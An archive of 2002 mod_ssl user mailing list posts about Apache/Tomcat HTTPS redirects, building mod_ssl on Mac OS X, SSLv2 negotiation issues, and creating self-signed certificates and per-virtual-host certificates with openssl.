Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: main.gmane.org 1038590146 7069 216.227.98.91 (29 Nov 2002 17:15:46 GMT)
X-Complaints-To: usenet@main.gmane.org
NNTP-Posting-Date: Fri, 29 Nov 2002 17:15:46 +0000 (UTC)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Christmann 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Environment:

Running Apache 2.0.43/OpenSSL 9.6.g as downloaded from 
hunter.campbus.com and mod_jk 1.2.1 for build 2.0.43 from jakarta.

Problem:

When I access the URL https://localhost/app, I *hope* to get the 
contents of index.html (i.e., https://localhost/app/index.html). 
Instead, my browser (Mozilla 1.0) reports a "Bad Request" error, 
indicating that there was a protocol error in accessing the URL 
"http://localhost:443/app/index.html".

Of course there will be a protocol error -- using http to talk to the 
https port!

Any ideas where that error might come from?  I assume its something 
happening with a redirect in Tomcat.

FWIW:

Each of the following URLs work fine (right now, I have Apache 
configured to take all connections either from http or https and forward 
to Tomcat):

+ http://localhost/app
+ http://localhost/app/index.html
+ https://localhost/app/index.html

Its only the https://localhost/app URL that's failing.

Thanks for any assistance,

Paul Christmann


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 30 18:42:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28637; Sat, 30 Nov 2002 18:41:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailserver.kippdata.de id SAA28627; Sat, 30 Nov 2002 18:40:46 +0100 (MET)
Received: from pfarr.kippdata.de ([195.227.30.175] (may be forged))
	by mailserver.kippdata.de (8.8.6/8.8.6) with ESMTP id SAA16082
	for ; Sat, 30 Nov 2002 18:43:41 +0100 (MET)
Message-Id: <5.1.1.6.0.20021130184634.0212cbe0@mailserver.kippdata.de>
X-Sender: jung@mailserver.kippdata.de
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Sat, 30 Nov 2002 18:48:05 +0100
To: modssl-users@modssl.org
From: Rainer Jung 
Subject: bugdb
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA28630
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

does anybody know, why the mod_ssl bugdb is not accessible at the moment?

The link to the bugdb on the support page only gives the listing of a 
directory, instead of activating the cgi.

Maybe someone is able to repair it.

Thanks for your help

Rainer Jung


kippdata informationstechnologie GmbH
Bornheimer Straße 33a
D-53111 Bonn
Germany

Tel.: +49/228/98549-0
Fax:  +49/228/98549-50
email: rainer.jung@kippdata.de

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec  1 00:46:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA11728; Sun, 1 Dec 2002 00:45:37 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mercury.kineticode.com id AAA11651; Sun, 1 Dec 2002 00:44:40 +0100 (MET)
Received: from wheeler.net (localhost [127.0.0.1])
	by mercury.kineticode.com (8.12.2/8.12.2) with ESMTP id gAUNilp5018607;
	Sat, 30 Nov 2002 15:44:48 -0800 (PST)
Date: Sat, 30 Nov 2002 15:44:47 -0800
Subject: Patch for Mac OS X
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v548)
Cc: rse@engelschall.com, macosx@perl.org
To: modssl-users@modssl.org
From: David Wheeler 
Content-Transfer-Encoding: 7bit
Message-Id: 
X-Mailer: Apple Mail (2.548)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Wheeler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This patch allows mod_ssl to compile on Mac OS X without first 
installing OpenSSL. This is because OpenSSL is already installed on Mac 
OS X, but mod_ssl doesn't know how to find its libraries.

--- libssl.module~      Fri Oct  4 06:09:50 2002
+++ libssl.module       Sat Nov 30 15:17:23 2002
@@ -411,7 +411,7 @@
      if [ ".$SSL_BASE" = .SYSTEM ]; then
          SSL_LIBDIR=""
          for p in . /lib /usr/lib /usr/local/lib; do
-            if [ -f "$p/libssl.a" -o -f "$p/libssl.so" ]; then
+            if [ -f "$p/libssl.a" -o -f "$p/libssl.so" -o -f 
"$p/libssl.dylib" ]; then
                  SSL_LIBDIR="$p"
                  my_real_ssl_libdir="$p"
                  break

Please let me know ASAP if this is the correct solution, as I'm writing 
an article for MacDevCenter.com (an ORA site) with instructions on how 
to build Apache/mod_ssl. I would think that it might make sense to 
include a section in which you determine the proper dso extension on 
the basis of OS, but this seems to work, too...

Thanks,

David

-- 
David Wheeler                                     AIM: dwTheory
david@wheeler.net                                 ICQ: 15726394
http://david.wheeler.net/                      Yahoo!: dew7e
                                                Jabber: Theory@jabber.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec  1 23:13:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA22447; Sun, 1 Dec 2002 23:12:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailserver.kippdata.de id XAA22443; Sun, 1 Dec 2002 23:11:20 +0100 (MET)
Received: from pfarr.kippdata.de ([195.227.30.175] (may be forged))
	by mailserver.kippdata.de (8.8.6/8.8.6) with ESMTP id RAA17151;
	Sun, 1 Dec 2002 17:32:24 +0100 (MET)
Message-Id: <5.1.1.6.0.20021201173039.02ba8a60@mailserver.kippdata.de>
X-Sender: jung@mailserver.kippdata.de
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Sun, 01 Dec 2002 17:36:43 +0100
To: modssl-users@modssl.org
From: Rainer Jung 
Subject: Difficult real world ssl problem
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAA22444
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

we encounter a strange ssl client behaviour on a high load web site. The 
setup is as follows:

The webserver is Apache 1.3.26 with mod_ssl 2.8.10 and openssl 0.9.6e. It 
has a VeriSign certificate with strong encryption enabled (GlobalID, 
corrsponding to SGC in MSIE and Internal SteUp in Netscape) and the 
hardware ist based on a Sun Solaris E420R, 4 CPUs and NCipher Crypto 
accelerator. mod_ssl uses shmht-session cache. No Keep-Alive is used.

The whole site worked very good for more than a year. Then unfortunately 
too many configurations were changed at the same time (Webserver config, 
load-balancers, virtual hosts, firewalls).

Now we can see a lot of requests which are no longer able to negotiate 
strong encryption. In fact, initially the browsers successfully connect and 
some requests work, but suddenly we can see requests from the same clients 
using weak encryption, which then is rejected by the web server config. All 
cases are MSIE Browsers, but a lot of different versions and Windows 
variants. It looks like browser upgrade to strong encryption helps, but 
also "weak" browsers could use the site without problems because the 
certificate has step-up ability coded in.

I describe one case as an example:

1) The first request of the client to the webserver gets the homepage. The 
Request ist successful and uses 128Bit RC4-MD5. The answer is a frameset.
2) The Browser connects again to get the first of the two frames in the 
frameset. It successfully resumes the SSL-Session.
3) The Browser connects again to get the second frame in the frameset. Now 
the request is rejected and the logfile says the Client tried to use 
EXP-RC4-MD5 40 Bit.

Using tcpdump/ssldump we can see the good requests 1) and 2) but for 3) 
ssldump only outputs:
New TCP connection #3: (63867) <-> (443)
Version 2 Client.
3    1038388800.4248 (0.1196)  S>C  TCP FIN
3    1038388800.4273 (0.0024)  C>S  TCP FIN

although there are a lot of packets in the tcpdump capture file, and 
verbose tcpdump with hexdump shows, that for instance in the packets are 
strings from the certificate.

4) The Client goes on successfully using the ssl connection from 1) and 2).

Now the question is: Do you have any idea, why one request in the middle of 
the sessions uses SSL Version 2?

Yours sincerely,

Rainer Jung


kippdata informationstechnologie GmbH
Bornheimer Straße 33a
D-53111 Bonn
Germany

Tel.: +49/228/98549-0
Fax:  +49/228/98549-50
email: rainer.jung@kippdata.de

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec  2 15:35:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA04020; Mon, 2 Dec 2002 15:34:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mx2.isigateway.com id PAA04004; Mon, 2 Dec 2002 15:33:21 +0100 (MET)
Received: (qmail 24989 invoked from network); 2 Dec 2002 14:46:47 -0000
Received: from unknown (HELO galahad.isinet.com) (199.4.155.10)
  by mx2.isigateway.com with SMTP; 2 Dec 2002 14:46:47 -0000
Received: (qmail 21006 invoked from network); 2 Dec 2002 14:30:10 -0000
Received: from isi-mail.isinet.com (198.62.99.181)
  by galahad.isinet.com with SMTP; 2 Dec 2002 14:30:10 -0000
Received: by isi-mail.isinet.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 2 Dec 2002 09:32:40 -0500
Message-ID: <92F9C07FBAB86D4D9B76656180AC94774A1651@isi-mail.isinet.com>
From: "Long, Liesheng" 
To: "'modssl-users@modssl.org'" 
Subject: License/Patent
Date: Mon, 2 Dec 2002 09:32:36 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Long, Liesheng" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I am trying to setup a secure web server based on Apache, mod_ssl, open ssl,
and mod_perl--of course, some of their dependency. It looks like all of them
are in public domain now -- free or patent expired. Does anybody know what
components still require licensing or written permission? Thanks a lot.


Regards,

Liesheng
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec  2 22:18:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA19575; Mon, 2 Dec 2002 22:17:58 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mx2.isigateway.com id WAA19526; Mon, 2 Dec 2002 22:16:16 +0100 (MET)
Received: (qmail 28178 invoked from network); 2 Dec 2002 21:29:44 -0000
Received: from unknown (HELO galahad.isinet.com) (199.4.155.10)
  by mx2.isigateway.com with SMTP; 2 Dec 2002 21:29:44 -0000
Received: (qmail 12744 invoked from network); 2 Dec 2002 21:13:05 -0000
Received: from isi-mail.isinet.com (198.62.99.181)
  by galahad.isinet.com with SMTP; 2 Dec 2002 21:13:05 -0000
Received: by isi-mail.isinet.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 2 Dec 2002 16:15:37 -0500
Message-ID: <92F9C07FBAB86D4D9B76656180AC94774A16E7@isi-mail.isinet.com>
From: "Long, Liesheng" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Problems with creating own CA
Date: Mon, 2 Dec 2002 16:15:35 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id WAA19542
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Long, Liesheng" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Do ".csr" first, then do ".crt"

Try the following commands, add your path if needed:

1. openssl req -config openssl.cnf -new -key ca.key -out ca.csr
2. openssl x509 -extfile openssl.conf -days 365 -signkey ca.key \
			-in ca.csr -req -out ca.crt


-----Original Message-----
From: Sasa STUPAR [mailto:sasa@stupar.homelinux.net] 
Sent: Thursday, November 28, 2002 11:50 AM
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA

One thing, if I try to use directly with the command "openssl req -new
-x509 -days 365 -key ca.key -out ca.crt" I get back error like before
with also that it canot load config info.
Any idea ?

Maurizio Marini a écrit:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Thursday 28 November 2002 05:01 pm, Sasa STUPAR wrote:
>  >They are already uncommented. Here is attached my config file.
> I've:
> commonName                      = Common Name (eg, your name or your
server\'s 
> hostname)
> commonName_max                  = 64
> commonName_default              = iris.dev.datalogica.com
> 
> it seems u lack this:
> commonName_default              = your_fqdn
> 
> - -- 
> Maurizio Marini			GSM +39-335-8259739
> Altamura: +39-080-3105228	Fax +39-080-3105228
> Pesaro: 	+39-0721-54277 	Fax +39-0721-415055
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
> 
> iD8DBQE95kMq4Q/49nIJTlwRAi2VAJwLwvjSjLUXjj/x9L0I3PWLF6lRLQCfaTxG
> STINIYzTZ0FPIeYy3o5MKNg=
> =t8N+
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 14:52:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA02889; Tue, 3 Dec 2002 14:51:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id OAA02876; Tue, 3 Dec 2002 14:50:24 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO000020;
    3 Dec 02 14:50:23 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 3 Dec 02 14:50:02 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG00001F;
   3 Dec 02 14:49:51 +0100
Message-ID: <3DECB690.6050603@stupar.homelinux.net>
Date: Tue, 03 Dec 2002 14:50:08 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
References: <92F9C07FBAB86D4D9B76656180AC94774A16E7@isi-mail.isinet.com>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Well, the thing is that just adding "...-config openssl.cnf..." was
enough. now it works.

Thanx

Long, Liesheng a écrit:
> Do ".csr" first, then do ".crt"
> 
> Try the following commands, add your path if needed:
> 
> 1. openssl req -config openssl.cnf -new -key ca.key -out ca.csr
> 2. openssl x509 -extfile openssl.conf -days 365 -signkey ca.key \
> 			-in ca.csr -req -out ca.crt
> 
> 
> -----Original Message-----
> From: Sasa STUPAR [mailto:sasa@stupar.homelinux.net] 
> Sent: Thursday, November 28, 2002 11:50 AM
> To: modssl-users@modssl.org
> Subject: Re: Problems with creating own CA
> 
> One thing, if I try to use directly with the command "openssl req -new
> -x509 -days 365 -key ca.key -out ca.crt" I get back error like before
> with also that it canot load config info.
> Any idea ?
> 
> Maurizio Marini a écrit:
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>> 
>> On Thursday 28 November 2002 05:01 pm, Sasa STUPAR wrote:
>>  >They are already uncommented. Here is attached my config file.
>> I've:
>> commonName                      = Common Name (eg, your name or your
> server\'s 
>> hostname)
>> commonName_max                  = 64
>> commonName_default              = iris.dev.datalogica.com
>> 
>> it seems u lack this:
>> commonName_default              = your_fqdn
>> 
>> - -- 
>> Maurizio Marini			GSM +39-335-8259739
>> Altamura: +39-080-3105228	Fax +39-080-3105228
>> Pesaro: 	+39-0721-54277 	Fax +39-0721-415055
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1.0.6 (GNU/Linux)
>> Comment: For info see http://www.gnupg.org
>> 
>> iD8DBQE95kMq4Q/49nIJTlwRAi2VAJwLwvjSjLUXjj/x9L0I3PWLF6lRLQCfaTxG
>> STINIYzTZ0FPIeYy3o5MKNg=
>> =t8N+
>> -----END PGP SIGNATURE-----
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 15:24:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA05397; Tue, 3 Dec 2002 15:23:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id PAA05363; Tue, 3 Dec 2002 15:22:21 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO000023;
    3 Dec 02 15:22:19 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 3 Dec 02 15:22:01 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG000022;
   3 Dec 02 15:21:48 +0100
Message-ID: <3DECBE0F.5030001@stupar.homelinux.net>
Date: Tue, 03 Dec 2002 15:22:07 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
References: <92F9C07FBAB86D4D9B76656180AC94774A16E7@isi-mail.isinet.com> <3DECB690.6050603@stupar.homelinux.net>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

OK, so creating a certifikate is done. How do I sign it ? I am using
windows but I have read in the documents to use sign.sh in mod-perl. Ok
but I am not having Linux anywhere near me. So what can I do ?

Sasa STUPAR wrote:
> Well, the thing is that just adding "...-config openssl.cnf..." was
> enough. now it works.
> 
> Thanx
> 
> Long, Liesheng a écrit:
>> Do ".csr" first, then do ".crt"
>> 
>> Try the following commands, add your path if needed:
>> 
>> 1. openssl req -config openssl.cnf -new -key ca.key -out ca.csr
>> 2. openssl x509 -extfile openssl.conf -days 365 -signkey ca.key \
>> 			-in ca.csr -req -out ca.crt
>> 
>> 
>> -----Original Message-----
>> From: Sasa STUPAR [mailto:sasa@stupar.homelinux.net] 
>> Sent: Thursday, November 28, 2002 11:50 AM
>> To: modssl-users@modssl.org
>> Subject: Re: Problems with creating own CA
>> 
>> One thing, if I try to use directly with the command "openssl req -new
>> -x509 -days 365 -key ca.key -out ca.crt" I get back error like before
>> with also that it canot load config info.
>> Any idea ?
>> 
>> Maurizio Marini a écrit:
>>> -----BEGIN PGP SIGNED MESSAGE-----
>>> Hash: SHA1
>>> 
>>> On Thursday 28 November 2002 05:01 pm, Sasa STUPAR wrote:
>>>  >They are already uncommented. Here is attached my config file.
>>> I've:
>>> commonName                      = Common Name (eg, your name or your
>> server\'s 
>>> hostname)
>>> commonName_max                  = 64
>>> commonName_default              = iris.dev.datalogica.com
>>> 
>>> it seems u lack this:
>>> commonName_default              = your_fqdn
>>> 
>>> - -- 
>>> Maurizio Marini			GSM +39-335-8259739
>>> Altamura: +39-080-3105228	Fax +39-080-3105228
>>> Pesaro: 	+39-0721-54277 	Fax +39-0721-415055
>>> -----BEGIN PGP SIGNATURE-----
>>> Version: GnuPG v1.0.6 (GNU/Linux)
>>> Comment: For info see http://www.gnupg.org
>>> 
>>> iD8DBQE95kMq4Q/49nIJTlwRAi2VAJwLwvjSjLUXjj/x9L0I3PWLF6lRLQCfaTxG
>>> STINIYzTZ0FPIeYy3o5MKNg=
>>> =t8N+
>>> -----END PGP SIGNATURE-----
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>> 
>> 
>> 
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 16:42:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA09290; Tue, 3 Dec 2002 16:41:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.dev.datalogica.com id QAA09270; Tue, 3 Dec 2002 16:40:42 +0100 (MET)
Received: from localhost (localhost [[UNIX: localhost]])
	by iris.dev.datalogica.com (8.11.6/8.11.6) id gB3FedG02472
	for modssl-users@modssl.org; Tue, 3 Dec 2002 15:40:39 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
Date: Tue, 3 Dec 2002 16:40:38 +0100
User-Agent: KMail/1.4.1
References: <92F9C07FBAB86D4D9B76656180AC94774A16E7@isi-mail.isinet.com> <3DECB690.6050603@stupar.homelinux.net> <3DECBE0F.5030001@stupar.homelinux.net>
In-Reply-To: <3DECBE0F.5030001@stupar.homelinux.net>
MIME-Version: 1.0
Message-Id: <200212031640.38993.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA09272
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tuesday 03 December 2002 03:22 pm, Sasa STUPAR wrote:
 >OK, so creating a certifikate is done. How do I sign it ? I am using
 >windows but I have read in the documents to use sign.sh in mod-perl. Ok
 >but I am not having Linux anywhere near me. So what can I do ?
 >

try a self-signed
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout server.key -out server.crt


- -- 
Maurizio Marini		
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE97NB24Q/49nIJTlwRAu9MAJwP7waOwN/J2dYSzL4L9RkHNjpRrwCfTI65
M0p49MjvotSa30mCfOFLL30=
=P32L
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 19:21:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA17196; Tue, 3 Dec 2002 19:20:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from vwall.rnd id TAA17179; Tue, 3 Dec 2002 19:19:36 +0100 (MET)
Received: (qmail 32260 invoked by uid 64014); 3 Dec 2002 18:19:40 -0000
Received: from tsandor@rndsoft.com by vwall by uid 64011 with qmail-scanner-1.14 
 (iscan: v3.1/v6.150-1001/391/48475.  Clear:. 
 Processed in 0.071082 secs); 03 Dec 2002 18:19:40 -0000
Received: from unknown (HELO tomaxp) (192.168.1.2)
  by vwall.rnd with SMTP; 3 Dec 2002 18:19:40 -0000
Message-ID: <004001c29af8$8d325c50$1c01010a@tomaxp>
From: "Thomas Sandor" 
To: 
Subject: how to add multiple SSL cert for each virtual host?
Date: Tue, 3 Dec 2002 19:19:43 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="windows-1250"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Thomas Sandor" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

hi everyone,

I have an apache 2.0.40 installed on a RedHat 7.2 box, complied with ssl
(openssl 0.9.6g).
Till now I had only one domain for which apache should use SSL cert files
(crt, key), but for our next project I have to add another SSL cert file a
specific domain.

I have NameVirtualHost 12.34.56.78 and have a list of  for
each of our domain, using ServerNamed base aliases, but for the ssl conf it
ain't works. In my ssl.conf in short looks like this:

NameVirtualHost 12.34.56.78:443


    ServerName domain1.com
    CustomLog "..."
    ErrorLog "..."
    SSLEngine on
    SSLCertificateFile "/somewhere/ssl.crt/domain1.crt"
    SSLCertificateKeyFile "somewhere/ssl.key/domain1.key"



    ServerName domain2.com
    CustomLog "..."
    ErrorLog "..."
    SSLEngine on
    SSLCertificateFile "/somewhere/ssl.crt/domain2.crt"
    SSLCertificateKeyFile "somewhere/ssl.key/domain2.key"


The problem is that apache does not serve domain2 cert files for domain2, it
uses the first declaration for every https://domainX.com invoke. Does anyone
know how to tell apache to uses specific SSL cert I'd like to define for
each of my virtualhosts?

Thanks in advance for any help.

Regards,
Thomas

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 19:28:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA17502; Tue, 3 Dec 2002 19:27:18 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id TAA17474; Tue, 3 Dec 2002 19:26:16 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA16803
	for ; Tue, 3 Dec 2002 13:26:51 -0500
Date: Tue, 3 Dec 2002 13:26:50 -0500 (EST)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: how to add multiple SSL cert for each virtual host?
In-Reply-To: <004001c29af8$8d325c50$1c01010a@tomaxp>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 3 Dec 2002, Thomas Sandor wrote:

	[SNIP]

> 
> The problem is that apache does not serve domain2 cert files for domain2, it
> uses the first declaration for every https://domainX.com invoke. Does anyone
> know how to tell apache to uses specific SSL cert I'd like to define for
> each of my virtualhosts?
> 

Yes assign a seperate IP address or port for each domain you wish to host.

